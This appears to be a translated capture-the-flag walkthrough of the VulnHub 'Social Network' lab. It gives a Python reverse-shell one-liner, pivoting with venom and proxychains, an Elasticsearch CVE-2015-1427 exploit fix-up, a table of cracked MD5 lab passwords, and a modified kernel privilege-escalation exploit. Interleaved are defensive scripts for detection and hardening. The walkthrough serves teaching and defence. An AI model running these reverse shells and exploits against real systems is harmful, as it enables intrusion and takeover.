Let’s hit the target 01


0x00 introduction to target

Target: BoredHackerBlog: Social Network ~ VulnHub

Target difficulty: medium

Recommended virtual machine: VirtualBox

0x01 content introduction

  • Attack techniques involved
    • Host discovery
    • Port scanning
    • Service discovery
    • Web path discovery
    • Code injection
    • Shell scripting
    • Intranet information gathering
    • Intranet pivoting (tunnelling and proxying)
    • Vulnerability exploitation
    • Password cracking
    • Local privilege escalation
    • Exploit code modification

0x02 environment construction

Download the target's .ova file and import it into VirtualBox

Make sure the target and Kali are on the same network segment

Kali IP address:

0x03 host discovery

Because the target and Kali are on the same network segment, a layer-2 host discovery technique is the first choice

Execute command: sudo arp-scan -l


Four IP addresses are found. The first three are addresses VirtualBox itself needs for normal operation, so the remaining one, the last address, is the target's IP

With the target's IP in hand, scan all ports to find out which ports and services the target has open

Execute command: sudo nmap -p-


The scan shows that the target has two open ports; next, detect the service versions on these two ports

Execute command: sudo nmap -p22,5000 -sV


From the scan results it can be concluded that

  • Port 22 is running the OpenSSH service, and the target is most likely an Ubuntu system

  • Port 5000 is running an httpd service; searching for the Werkzeug keyword shows that this is the underlying framework of a web application developed in Python. This means the server-side language environment is Python 2.7, so if a code execution vulnerability is found later, a Python script can be used to obtain a reverse shell and gain control


Since a web application is running, open the site in a browser to see whether there is a default page, and if so whether it offers any injection point



It turns out to be a social networking site. A quick security check finds no obvious known vulnerabilities on the default page and no cross-site scripting, so there is nothing to gain here

When pentesting a web application, one routine step that must always be done is web application path discovery: check whether hidden paths and pages contain form submission points or other vulnerabilities

There are many tools for crawling web application paths, for example Mitsurugi on the Windows platform; on Kali, dirsearch is used this time

By crawling the application's paths we are likely to find the admin (backend) address, and attacking the backend has a good chance of revealing the breakthrough point into the target system

Execute command: dirsearch -u


The scan finds one path. Open it in the browser:


The page turns out to be a code execution page. Combined with the information gathered above, we know the server runs a Python 2.7 environment, so we can try injecting Python code to get a reverse shell

0x04 Python reverse shell

Searching the web for "Python reverse shell" turns up plenty of material, for example: Python bounce shell_ Rebound shell summary_ Hepu's blog CSDN blog


# The red-box part of the reference creates an interactive sh and a TCP connection to the listener on port 5555 (the IP is left blank in this post), then redirects sh's standard input, output and error to that socket

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);  # Create a socket; AF_INET = IPv4 (TCP/IP), SOCK_STREAM = TCP stream
s.connect(("",5555));  # IP address and port to connect to (the listener's IP is left blank here)
os.dup2(s.fileno(),0);  # os.dup2(fd, fd2) copies file descriptor fd onto fd2; s.fileno() returns the socket's integer descriptor, usable for low-level OS I/O
os.dup2(s.fileno(),1);  # the three dup2 calls point standard input (0), standard output (1) and standard error (2) at the socket in turn
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);  # subprocess.call() runs the given command and returns its exit status, 0 or non-zero
                                      # ["/bin/bash","-i"] or ["/bin/sh","-i"] both work
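The dup2() trick explained above leaves a distinctive trace on the compromised host: an interactive shell whose descriptors 0, 1 and 2 are all the same socket. As an added, defender-side example (not code from the original post or from its reference), the script below walks the Linux /proc filesystem and reports such shells. The function names and the SHELL_NAMES list are my own choices.

```python
import os
import re

# Process names that count as shells (my own list, not from the post)
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ash"}
# readlink(/proc/<pid>/fd/<n>) gives "socket:[<inode>]" for a socket
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")


def stdio_is_single_socket(fd_links):
    """fd_links maps fd number (0, 1, 2) to the readlink() target of
    /proc/<pid>/fd/<n>. True when all three standard descriptors point at
    the same socket inode, which is exactly what the three dup2() calls
    in the reverse-shell one-liner produce."""
    inodes = set()
    for fd in (0, 1, 2):
        m = SOCKET_LINK.match(fd_links.get(fd, ""))
        if not m:
            return False
        inodes.add(m.group(1))
    return len(inodes) == 1


def read_fd_links(pid):
    """Link targets of fds 0-2 of a live process (entries are simply
    absent when the process exited or is not readable)."""
    links = {}
    for fd in (0, 1, 2):
        try:
            links[fd] = os.readlink("/proc/%d/fd/%d" % (pid, fd))
        except OSError:
            pass
    return links


def process_name(pid):
    """Short command name from /proc/<pid>/comm, or "" if unreadable."""
    try:
        with open("/proc/%d/comm" % pid) as f:
            return f.read().strip()
    except OSError:
        return ""


def find_socket_shells():
    """Return [(pid, name)] for shells whose stdio is one single socket."""
    hits = []
    try:
        entries = os.listdir("/proc")
    except OSError:  # no Linux /proc here: nothing to scan
        return hits
    for entry in entries:
        if not entry.isdigit():
            continue
        pid = int(entry)
        name = process_name(pid)
        if name in SHELL_NAMES and stdio_is_single_socket(read_fd_links(pid)):
            hits.append((pid, name))
    return hits


if __name__ == "__main__":
    for pid, name in find_socket_shells():
        print("suspicious: pid %d (%s) has stdin/stdout/stderr on one socket" % (pid, name))
```

Run it as root on the host you are checking. Shells started by inetd-style services legitimately have socket stdio, so treat a hit as a lead and pair it with the network side (which remote address and port the socket is connected to) before acting on it.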

The reference is shown below

Check Kali's own IP

Execute command: ip a


Use nc to start listening

Execute command: nc -nvlp 4444


Then execute the Python reverse-shell code on the web page. Here only ["/bin/sh","-i"] runs successfully. Remember to change the IP address to Kali's IP and the port to the port nc is listening on

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);


After clicking the Test code button on the page, the nc listener responds and a reverse shell is obtained


Run a couple of simple commands to check the current path and account privileges


Luckily it is root, but is that the whole truth?

0x05 determine whether we are inside a docker container

A Dockerfile is a text file used to build images; it contains, one after another, the instructions and descriptions needed to build an image.

A Dockerfile is usually used as a template for the standardized deployment of docker containers in production and development environments. It describes how to import the docker image, how to configure it, which software packages to install, which services to modify, and so on. A developer can hand this template to the people deploying the application, who can then deploy containers uniformly, consistently and at scale on the production servers. In a word, a Dockerfile is a template file for standardized deployment.

When running ls, a file named Dockerfile was seen. Does that mean the system on which root was obtained is actually a system inside a docker container?

Check the contents of the Dockerfile

Execute command: cat Dockerfile


#docker build -t socnet .
#docker run -td --rm -p 8080:8080 socnet
# FROM: pull the base image from Docker Hub or a local repository; Alpine is a suitable base image at under 5 MB
FROM python:2.7-alpine
# COPY: copy files or directories into the image; similar to ADD, but without automatic download or extraction
COPY . /app
# WORKDIR: switch the working directory for the instructions that follow
WORKDIR /app
# RUN: execute the command in a new layer on top of the current image and commit the result; the committed image is used by the next instruction
RUN pip install -r requirements.txt
# CMD: the command the container starts with; if several CMDs exist the last one wins; it can also supply parameters for ENTRYPOINT
CMD ["python", "/app/main.py"]

Reference: Access road of dockerfile_ Peithon's blog CSDN blog_ dockerfile run

This Dockerfile is a standard Dockerfile template, and reading it deepens the suspicion that this is a docker system

For conclusive proof, there are two methods (commands) for identifying a docker container

  1. Method 1 (90%): check whether the .dockerenv file exists in the system's root directory; execute command: ls /.dockerenv


  2. Method 2 (100%): view the /proc/1/cgroup file; execute command: cat /proc/1/cgroup

    If something like the following appears, you can be 100% sure that this is a docker container system; the docker container's id (hash) follows the word docker

    Reason: after a Linux system boots, PID 1 is the init process of the system. When the cgroup file of PID 1 clearly contains docker container information, that is 100% proof that the current system is a docker container


That settles it: the root privileges obtained are inside a docker container
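The two checks above are easy to automate. The following script is an added example of mine, not code from the original post: it tests the /.dockerenv marker and then parses /proc/1/cgroup, and also pulls out the container id (the hash the text mentions). The file paths are parameters so the logic can be exercised on constructed input; the sample cgroup dumps are constructed, not captured from the lab. It goes a little beyond the post by also recognising the cgroup paths written by containerd, Kubernetes and LXC.

```python
import os
import re

# Runtimes whose names show up in a container's cgroup path
CONTAINER_MARKERS = re.compile(r"(docker|containerd|kubepods|lxc)")


def cgroup_indicates_container(cgroup_text):
    """True when any line of a /proc/1/cgroup dump mentions a container
    runtime, e.g. "12:cpuset:/docker/<container id>"."""
    return any(CONTAINER_MARKERS.search(line) for line in cgroup_text.splitlines())


def container_id_from_cgroup(cgroup_text):
    """The hex id Docker appends to the cgroup path (cgroup v1 "/docker/<id>",
    systemd/cgroup v2 "docker-<id>.scope"), or None when there is none."""
    m = re.search(r"docker[/-]([0-9a-f]{12,64})", cgroup_text)
    return m.group(1) if m else None


def in_container(dockerenv_path="/.dockerenv", cgroup_path="/proc/1/cgroup"):
    """(is_container, reason): method 1 (marker file) first, method 2
    (PID 1's cgroup) as the decisive check."""
    if os.path.exists(dockerenv_path):
        return True, "%s exists" % dockerenv_path
    try:
        with open(cgroup_path) as f:
            text = f.read()
    except OSError:
        return False, "%s not readable" % cgroup_path
    if cgroup_indicates_container(text):
        return True, "PID 1 cgroup references a container runtime (id %s)" % container_id_from_cgroup(text)
    return False, "no container evidence"


# Constructed sample of what "cat /proc/1/cgroup" prints inside a container
SAMPLE_CONTAINER_CGROUP = (
    "12:cpuset:/docker/" + "0123456789abcdef" * 4 + "\n"
    "11:memory:/docker/" + "0123456789abcdef" * 4 + "\n"
)
# Constructed sample from a normal host, where PID 1 sits at the cgroup root
SAMPLE_HOST_CGROUP = "12:cpuset:/\n11:memory:/\n"

if __name__ == "__main__":
    flag, why = in_container()
    print("container" if flag else "not a container", "-", why)
```

Beyond a pentest, the same check is handy in deployment scripts and incident triage: a shell that lands in a container is a different blast radius from one on the host, and the extracted id maps straight back to `docker ps` on that host.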

0x06 intranet host discovery

View the IP address of the current docker container

Execute command: ip a


The IP address obtained is different from the target IP attacked earlier, which further confirms that this is a docker container, because the two addresses differ

The network segment the docker container sits in can now be treated as the intranet. The usual next step is to ask: are there other hosts on the intranet? If so, do they have known vulnerabilities? Can those vulnerabilities be used to attack more intranet systems?

Host discovery on the intranet: the target does not have the many tools Kali has, so the ping command is the most appropriate choice. The subnet mask is 16 bits, so in theory there are 65535 IP addresses; pinging them one by one by hand is unrealistic and calls for automation. A relatively simple method is a script that loops over the specified intranet segment with ping

# Scan the whole 172.17.0.0/16 range and print only the replies (lines containing "ttl"); the third octet runs 0-255 because the containers sit in 172.17.0.x, and -W 1 caps the wait for each probe at one second
for i in $(seq 0 255);do for j in $(seq 1 254);do ping -c 1 -W 1 172.17.$i.$j | grep "ttl";done;done

Because there are not that many targets here, only the first few addresses of 172.17.0.x are scanned

Execute command: for i in $(seq 1 10);do ping -c 1 172.17.0.$i | grep "ttl";done


After the scan, excluding 172.17.0.2, which is this machine, two live IP addresses are found. Next, port-scan 172.17.0.1 and 172.17.0.3 to see which services they run, whether they have vulnerabilities, and whether they can be penetrated

0x07 intranet penetration

Because 172.17.x.x is an intranet segment, Kali cannot reach it directly. To solve this, intranet pivoting is needed to route traffic between Kali and the 172.17 network

With venom, a tunnel between Kali and the intranet can be set up easily, and a proxy can be created on top of it so that the many tools on Kali can reach the target's intranet through that proxy

venom GitHub address: GitHub – Dliv3/Venom: Venom – A Multi-hop Proxy for Penetration Testers

First download the venom archive to Kali and unpack it


Check the target system's version

Execute command: uname -a


The target is 64-bit Linux, so pick the agent_linux_x64 program from venom


Transfer the agent_linux_x64 client to the target system and run the matching server, admin_linux_x64, on this machine

Run admin_linux_x64 locally on Kali, listening on port 9999

Execute command: ./admin_linux_x64 -lport 9999


The target needs to obtain the venom client and run it to connect to the server; that establishes the tunnel

Start an HTTP server on Kali, then fetch the agent_linux_x64 client on the target with wget

Start the HTTP service on Kali; execute command: python3 -m http.server 80


Fetch the client program with wget on the target

Execute command: wget


Make it executable

Execute command: chmod +x agent_linux_x64


Start the client and connect to the server to establish the tunnel

Execute command: ./agent_linux_x64 -rhost -rport 9999



Start a socks listener on the server side


This gives a socks5 proxy listening on port 1080 on Kali

For all tools on Kali to go through that proxy into the intranet, proxychains is also needed

Edit the proxychains configuration file and set the proxy type, IP and port

Execute command: sudo vim /etc/proxychains4.conf


0x08 intranet port scanning

Use nmap to port-scan the intranet IP:

Execute command: proxychains nmap -Pn -sT


The scan shows ports 22 and 5000 open. Scan the service versions on 22 and 5000

Execute command: proxychains nmap -p22,5000 -Pn -sT -sV


The result looks familiar: it is exactly the same as the earlier scan of the target

Visit port 5000 of this host in the browser on Kali

To switch proxies conveniently, install the FoxyProxy Standard extension in Firefox; extension address: FoxyProxy standard download


Add a Socks5 proxy in the FoxyProxy Standard extension




The browser uses the proxy


Access intranet host 172.17.0.1:5000


The content shown is exactly the same as the earlier visit, even the manual test data is visible. This shows that 172.17.0.1 is the container's host machine, that is, the original target seen through the IP it has on the container network, so 172.17.0.3 is the next target to attack

Next, continue by port-scanning 172.17.0.3

Execute command: proxychains nmap -Pn -sT


The scan shows that only port 9200 is open. Scan the service running on this port

Execute command: proxychains nmap -p9200 -Pn -sT -sV


According to the scan, Elasticsearch is running on 9200, version 1.4.2
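A 1.4.2 banner is exactly the kind of thing a defender wants to catch in inventory before a pentester does. The following is an added example of mine, not code from the original post: it parses the JSON an Elasticsearch node returns for "GET /" and flags builds that predate the fix for CVE-2015-1427, the vulnerability this walkthrough goes on to use. The fixed versions (1.3.8 and 1.4.3) are taken from the Elastic advisory for that CVE; the sample banner is constructed, not captured from the lab.

```python
import json

# Constructed sample of the "GET /" response from a 1.4.2 node
SAMPLE_BANNER = json.dumps({
    "status": 200,
    "name": "node-1",
    "version": {"number": "1.4.2", "build_snapshot": False, "lucene_version": "4.10.2"},
    "tagline": "You Know, for Search",
})

# First build of each affected release line that carries the fix for CVE-2015-1427
FIXED_IN = {(1, 3): (1, 3, 8), (1, 4): (1, 4, 3)}


def parse_version(number):
    """'1.4.2' -> (1, 4, 2); a missing patch field becomes 0 and any
    '-SNAPSHOT' / '-beta' suffix is ignored."""
    parts = number.split("-")[0].split(".")[:3]
    return tuple(int(p) for p in parts) + (0,) * (3 - len(parts))


def vulnerable_to_cve_2015_1427(version):
    """True when a 1.3.x / 1.4.x node predates the fixed build, False when
    it has the fix, None for release lines outside the advisory's scope."""
    fixed = FIXED_IN.get(version[:2])
    if fixed is None:
        return None
    return version < fixed


def assess_banner(banner_json):
    """(version string, verdict) for a GET / response body."""
    number = json.loads(banner_json)["version"]["number"]
    return number, vulnerable_to_cve_2015_1427(parse_version(number))


if __name__ == "__main__":
    number, verdict = assess_banner(SAMPLE_BANNER)
    print("Elasticsearch %s: %s" % (number, {True: "VULNERABLE to CVE-2015-1427",
                                             False: "fixed", None: "out of scope, check advisory"}[verdict]))
```

In practice the banner comes from an HTTP GET against port 9200 of each node in the inventory; feed the body to assess_banner(). Nodes that cannot be upgraded should at least not expose 9200 to untrusted networks, which is the root of the problem on this target.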

0x09 Elasticsearch RCE

Elasticsearch has had several very serious vulnerabilities in past versions, the worst of which are RCE (remote code execution) vulnerabilities

Use searchsploit to see whether Kali has known Elasticsearch exploit code

Execute command: searchsploit Elasticsearch


The first two search results are remote code execution vulnerabilities. Copy these two exploits and try them one by one to see whether the Elasticsearch server can be broken into

First try the exploit 36337.py; copy it to the current directory

Execute command: cp /usr/share/exploitdb/exploits/linux/remote/36337.py .


Take a quick look at this Python script to see how it exploits the vulnerability


The script is written in Python 2

Run the script; execute command: python2 36337.py


The prompt shows that the target IP has to be appended

Execute the command again: proxychains python2 36337.py


A result comes back quickly; try the id command to see which account's privileges were obtained

Execute command: id


The script exited with an error, so the problem has to be found and fixed. From the prompt we learn that this vulnerability is CVE-2015-1427

Search the web for CVE-2015-1427 to see how it is exploited. Reference link: Cve-2015-1427 (groovy sandbox bypass & & Code Execution Vulnerability) – smile 996 – blog Garden (cnblogs.com)


The exploitation steps are

  1. Insert data
  2. Build the payload using the data just inserted

Now look again at the exploit code copied from Kali

Execute command: vim 36337.py


Comparing the payload in the reference with the one in the Python script, most of the content is the same. The only difference is that the key used in the reference's payload, test#, was inserted into Elasticsearch beforehand, while the key lupin used in the Python script's payload was not. If lupin is inserted into Elasticsearch first, will the script run normally? Worth a try

Use burpsuite with the Socks5 proxy to send a POST request to Elasticsearch and insert the data lupin

First open burpsuite


Check burpsuite's proxy port


Configure burpsuite to use the socks proxy


Configure the browser to use the burpsuite proxy



Open the page with the browser


Send the request captured by burpsuite to the Repeater module

Modify the HTTP request into the format that inserts lupin, and click Send


After the insert succeeds, try the command again: proxychains python2 36337.py


The id command now succeeds! Another root account is obtained, but again it is only root inside a container

Execute command: cat /proc/1/cgroup


0x0a privilege escalation via a kernel vulnerability

While gathering information in this container, a file named passwords was found

Execute command: ls /


Could it contain sensitive passwords? Out of curiosity

Execute command: cat /passwords


It is indeed an account and password file, with the account name in front and the password hash behind

Using an online MD5 lookup site, the plaintext of every hash was found. Query link: MD5 free online decryption and cracking_ MD5 online encryption -somd5

Account   Password (MD5 hash)                  Password (plaintext)
john      3f8184a7343664553fcb5337a3138814     1337hack
test      861f194e9d6118f3d942a72be3e51749     1234test
admin     670c3bbc209a18dde5446e5e6c1f1d5b     1111pass
root      b3d34352fc26117979deabdf1b9b6354     1234pass
jane      5c158b60ed97c723b673529b8a3cf72b     1234jane
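The reason every row fell to a single website lookup is that the file stores unsalted MD5: the same password always produces the same hash, so one precomputed table answers all of them. The following is an added example of mine, not code from the original post or the target application: it puts that storage scheme next to a salted, iterated one (PBKDF2-HMAC-SHA256 from the standard library) and shows the property that changes. The user records and passwords in the example are constructed, not the ones from the lab.

```python
import hashlib
import hmac
import os

ITERATIONS = 200000  # PBKDF2 work factor; raise it as hardware allows


def md5_store(password):
    """What the lab's /passwords file did: unsalted MD5. Deterministic, so one
    precomputed table (or one web lookup) answers every record at once."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_store(password, salt=None):
    """Salted, iterated hash. Record format 'salt_hex$hash_hex'; a fresh
    16-byte random salt per record unless one is supplied (for tests)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def pbkdf2_verify(password, record):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, hash_hex = record.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(dk.hex(), hash_hex)


def same_password_collides(password, store):
    """True if storing one password twice yields identical records, i.e. an
    attacker can spot shared passwords and reuse a single lookup for all."""
    return store(password) == store(password)


if __name__ == "__main__":
    # Constructed demo records, not the lab's
    for user, pw in (("alice", "1234pass"), ("bob", "1234pass")):
        print(user, "md5   :", md5_store(pw))
        print(user, "pbkdf2:", pbkdf2_store(pw))
```

Run it and the two MD5 lines are identical while the two PBKDF2 lines differ, which is the whole difference: with a salt and a work factor, the attacker must run the 200 000 iterations per guess per user instead of consulting a table built once for everyone.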

With these accounts and passwords, try logging in to the IPs that have port 22 open, first of all 10.0.2.15

After trying, the john account turned out to log in to 10.0.2.15 successfully; unfortunately none of the others work

Execute command: ssh john@10.0.2.15


Logged in to the target successfully

john is currently the only usable account. See whether it can elevate itself to root; if so, this target is done

Execute command: sudo -s


Unfortunately not: no sudo privileges

If root is still wanted, local privilege escalation is the only way

There are many local privilege escalation methods, but the main one is exploiting kernel vulnerabilities

Check the system kernel; execute command: uname -a


The target's kernel version is 3.13, a very old version; for a kernel this old there are generally known vulnerabilities

Use searchsploit again to search for linux 3.13 exploit code

Execute command: searchsploit linux 3.13


Many results come up; choose a local privilege escalation exploit

In real penetration scenarios and real projects, many exploit versions may be found at this stage, and they have to be tried on the target one by one

For example, use 37292.c; first copy this exploit to the current directory

Execute command: cp /usr/share/exploitdb/exploits/linux/local/37292.c .


Check the code in this file

Execute command: vim 37292.c


From the description, this is a C source file, which has to be compiled with gcc before running

However, executing gcc on the target system:


shows that gcc is not installed on the target, so the exploit must be compiled on Kali first and then transferred to the target to run

Before running any exploit code on the target, it is strongly recommended to read the code first

Read the source again; execute command: vim 37292.c


Reading the source reveals

  1. Lines 139-147 invoke the gcc command from the C code to compile ofs-lib.c into ofs-lib.so, so even if the program is compiled on Kali in advance, it will still fail on the target because gcc is not installed there. There are many solutions; the simplest and most direct one is to edit the source, delete the compile part, and look for a ready-made ofs-lib.so in Kali
  2. Line 148 reads /tmp/ofs-lib.so, so when running on the target, ofs-lib.so must be placed in /tmp for the file to be read successfully

Edit the source file and delete the original lines 139-147; the modified content is as follows


Compile the modified C source

Execute command: gcc -o exp 37292.c


The warnings during compilation are harmless and do not affect the result

Check whether Kali has an ofs-lib.so file

Execute command: locate ofs-lib.so


It does exist. Copy it to the current directory

Execute command: cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .


Start the HTTP service on Kali and download the two files on the target with wget

Start the HTTP service; execute command: python3 -m http.server 80


The target downloads both files

Execute command:

  • wget

  • wget


For it to run, ofs-lib.so must be in the /tmp directory; the simplest way is to move both files to /tmp

Execute command: mv * /tmp


Make exp executable

Execute command: chmod +x exp


Run the exp program to escalate privileges

Execute command: ./exp


Congratulations: root was obtained, and this target is complete!

0x0b summary

  • Overview of the process in text

    1. First perform host discovery, then port and service scans on the discovered hosts
    2. The scan shows a web application on port 5000 of the target; open it in the browser
    3. The default page of the web application has no known vulnerabilities; next, probe the application's paths with dirsearch
    4. An /admin backend path is found. The backend page has a remote code execution vulnerability, and through it a reverse shell on the target is obtained
    5. After getting the shell, it turns out to be inside a docker container; from this container, host discovery is done on the intranet IP segment
    6. Two IP addresses are identified during intranet host discovery:
    7. An intranet tunnel is then established and a socks proxy opened, through which all ports and services of the live intranet hosts are scanned
    8. The scan finds 172.17.0.3 with port 9200 open; the application behind it is Elasticsearch
    9. A known Elasticsearch vulnerability is exploited and 172.17.0.3 is taken over
    10. Further information gathering on this host turns up a file named passwords
    11. The john account's password hash from that file is looked up with an online cracking tool
    12. With the account and password, login is attempted on all intranet hosts with port 22 open; in the end the target system is logged into
    13. After logging in, another problem: john is an ordinary account without sudo privileges
    14. Privilege escalation is required; uname -a shows the target kernel is a very old version, and a kernel exploit is selected
    15. However, the exploit cannot run gcc on the target, so its source is modified on Kali to remove the part that calls gcc, it is compiled there, and the dependent shared library is found in Kali
    16. Both files are transferred to the target; running the compiled program on the target finally gives root
  • Video link for the process: Click to view